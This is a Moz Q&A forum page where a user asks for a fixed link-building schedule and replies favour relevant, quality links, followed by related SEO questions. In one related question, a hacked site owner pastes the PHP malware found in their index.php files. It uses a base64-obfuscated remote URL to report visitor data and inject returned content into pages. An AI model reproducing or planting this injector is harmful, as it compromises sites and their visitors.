Suggest me a best plan for linking building chart for small static website.
-
Hi Everyone, Can any one suggest me a clear idea for off page link building chart i.e) Our page is a 24 page website we like to plan for off page activity like bookmarking, classifieds, directory bla bla bla. So how many links we are supposed to post and in how much day time gap example: 15 Links in bookmarking, 10 links in classified, weekly one article submission, after one week the same cycle goes on.....
-
There is no magic number of frequency of links that will secure you good, long-term high rankings. Richard is right, you shouldn't consider link building as a painting-by-numbers game where you decide on a number of links from one type of source and fill these numbers into a chart as the links are built.
Check out the link building category on the Moz blog. It contains years worth of high-quality content about creative, sustainable link development ideas.
Please keep in mind that "social bookmarking" is a very outdated technique. Depending on what you actually plan on doing, a lot of these links may be nofollowed as well, making their usefulness for SEO purposes negligible.
-
The secret is to get a googol links. Seriously though, quality over quantity. Try to get links in your niche. If you're a home builder then get links from home builder directories not general directories, if you're in a location look for those city directories and get local citations. Each industry is different, check out the links that your competitors and competitors from other markets have for ideas. You could spend a lot of time worrying about 15 bookmarking links, 10 classified links, and an article or some magic number, but I'd take one link from a relevant and authority website over all of this.
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
4 websites - meta titles and descriptions
I manage four separate websites/brands that all focus on the same topics and have the same achitecture. I am trying to improve each site's meta title and description, page by page, that I inherited from another before me. My question is, how different should each title/description be from one another for the same page type? Do the search engines consider this heavily in their decision process of who to show on SERPs? Am i able to simply swap out the brand name in the metas and call it done or should each meta be unique? if unique, how unique? As you can imagine, since each page is essentially the same with the same overall content and layout targeting the same keywords, it is very difficult to rewrite metas four unique ways. I greatly appreciate any advice on how you would approach this project.
White Hat / Black Hat SEO | | dsinger0 -
How to re-rank an established website with new content
I can't help but feel this is a somewhat untapped resource with a distinct lack of information.
White Hat / Black Hat SEO | | ChimplyWebGroup
There is a massive amount of information around on how to rank a new website, or techniques in order to increase SEO effectiveness, but to rank a whole new set of pages or indeed to 're-build' a site that may have suffered an algorithmic penalty is a harder nut to crack in terms of information and resources. To start I'll provide my situation; SuperTED is an entertainment directory SEO project.
It seems likely we may have suffered an algorithmic penalty at some point around Penguin 2.0 (May 22nd) as traffic dropped steadily since then, but wasn't too aggressive really. Then to coincide with the newest Panda 27 (According to Moz) in late September this year we decided it was time to re-assess tactics to keep in line with Google's guidelines over the two years. We've slowly built a natural link-profile over this time but it's likely thin content was also an issue. So beginning of September up to end of October we took these steps; Contacted webmasters (and unfortunately there was some 'paid' link-building before I arrived) to remove links 'Disavowed' the rest of the unnatural links that we couldn't have removed manually. Worked on pagespeed as per Google guidelines until we received high-scores in the majority of 'speed testing' tools (e.g WebPageTest) Redesigned the entire site with speed, simplicity and accessibility in mind. Htaccessed 'fancy' URLs to remove file extensions and simplify the link structure. Completely removed two or three pages that were quite clearly just trying to 'trick' Google. Think a large page of links that simply said 'Entertainers in London', 'Entertainers in Scotland', etc. 404'ed, asked for URL removal via WMT, thinking of 410'ing? Added new content and pages that seem to follow Google's guidelines as far as I can tell, e.g;
Main Category Page Sub-category Pages Started to build new links to our now 'content-driven' pages naturally by asking our members to link to us via their personal profiles. We offered a reward system internally for this so we've seen a fairly good turnout. Many other 'possible' ranking factors; such as adding Schema data, optimising for mobile devices as best we can, added a blog and began to blog original content, utilise and expand our social media reach, custom 404 pages, removed duplicate content, utilised Moz and much more. It's been a fairly exhaustive process but we were happy to do so to be within Google guidelines. Unfortunately, some of those link-wheel pages mentioned previously were the only pages driving organic traffic, so once we were rid of these traffic has dropped to not even 10% of what it was previously. Equally with the changes (htaccess) to the link structure and the creation of brand new pages, we've lost many of the pages that previously held Page Authority.
We've 301'ed those pages that have been 'replaced' with much better content and a different URL structure - http://www.superted.com/profiles.php/bands-musicians/wedding-bands to simply http://www.superted.com/profiles.php/wedding-bands, for example. Therefore, with the loss of the 'spammy' pages and the creation of brand new 'content-driven' pages, we've probably lost up to 75% of the old website, including those that were driving any traffic at all (even with potential thin-content algorithmic penalties). Because of the loss of entire pages, the changes of URLs and the rest discussed above, it's likely the site looks very new and probably very updated in a short period of time. What I need to work out is a campaign to drive traffic to the 'new' site.
We're naturally building links through our own customerbase, so they will likely be seen as quality, natural link-building.
Perhaps the sudden occurrence of a large amount of 404's and 'lost' pages are affecting us?
Perhaps we're yet to really be indexed properly, but it has been almost a month since most of the changes are made and we'd often be re-indexed 3 or 4 times a week previous to the changes.
Our events page is the only one without the new design left to update, could this be affecting us? It potentially may look like two sites in one.
Perhaps we need to wait until the next Google 'link' update to feel the benefits of our link audit.
Perhaps simply getting rid of many of the 'spammy' links has done us no favours - I should point out we've never been issued with a manual penalty. Was I perhaps too hasty in following the rules? Would appreciate some professional opinion or from anyone who may have experience with a similar process before. It does seem fairly odd that following guidelines and general white-hat SEO advice could cripple a domain, especially one with age (10 years+ the domain has been established) and relatively good domain authority within the industry. Many, many thanks in advance. Ryan.0 -
Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
Link "Building" or "Earning" Which one are you doing? Both?
I'm curious to see how SEO's interpret this section of the Google Webmaster Guidelines on Link Schemes: The best way to get other sites to create high-quality, relevant links to yours is to create unique, relevant content that can naturally gain popularity in the Internet community. Creating good content pays off: Links are usually editorial votes given by choice, and the more useful content you have, the greater the chances someone else will find that content valuable to their readers and link to it. (Source: https://support.google.com/webmasters/answer/66356?hl=en) I'm not asking what you "should" do, but rather what do YOU do... Do you interpret this as: Create awesome content and the links will come? Create Awesome Content and Outreach a bit? Perhaps you don't follow it all and concentrate on building links over content? What do you do and why? Discuss!
White Hat / Black Hat SEO | | BrettDixon0 -
Strange Pingback/Blog Comment Links
On one of my sites I've noticed some strange links from Google Webmaster Tools recent links feature. They are pingbacks/blog comments but they are using keyword anchor text and linking to my site. I know we are not doing this. Should I be concerned about this possibly being negative SEO? Here's a sample (be careful, shady site)
White Hat / Black Hat SEO | | eyeflow0 -
Can i send a disavow if a detect a spam link
I have detected than one web domain is generating 2400 links to my site should a use a disavow tools, as it is imposible to have contact from webmaster and no response to your emails My web as not been warned or penalized, but i dont like this link, and i want to inform google of that,. If google acepts the disavow file, should i still see on my webmaster tools that web links, or will they desapear thanks
White Hat / Black Hat SEO | | maestrosonrisas0 -
One good domain generating to much links what to do
I think penguin had no effect yet on spain. propdental.com remain the same.And propdental.es still growing.No penguin 2.0 effect. I think it will need a few more days to see if there is impact on spain.
White Hat / Black Hat SEO | | maestrosonrisas
Althought i have a question regarding coagnitive SEO, (is regarding a link to propdental.es from unidirectorio.com) i think is a good web, but as generated me an very big amount of links)i have this on link from unidirectorio.com that has generated 2400 links to www.propdental.es with this ancor text "clinica dental con dentistas especialistas en implantes dentales ortodoncia invisalign y carillas" Links is comes from this page http://undirectorio.com/Salud/dentistas/ and then generates 2400I can not remove this link. I seemed a good directory with just 3 pages linking out and good page rank on my specific field.I ask google to dont take that link into account, although i am not sure if i did it well.**Can someone tell me how to say to google to dont take in account the links from a domain?**google still shows this link on webmaster tools, i am afraid it ends up been bad. I seems a good directory is not an exact ancor text although containt all work i want to rank.What would be your advice? Do i have any way to make sure that google does not have the links recieved from that domain into account0 -
Anchor text for internal links
there has been a lof of discussion on this forum and elsewhere about over optimized anchor text, partial match anchor text vs exact anchor text match, etc. I am wondering iwhether or not exact anchor text matches are good or bad for internal links? Does anyone have anythoughts, or better, any studies? Paul
White Hat / Black Hat SEO | | diogenes0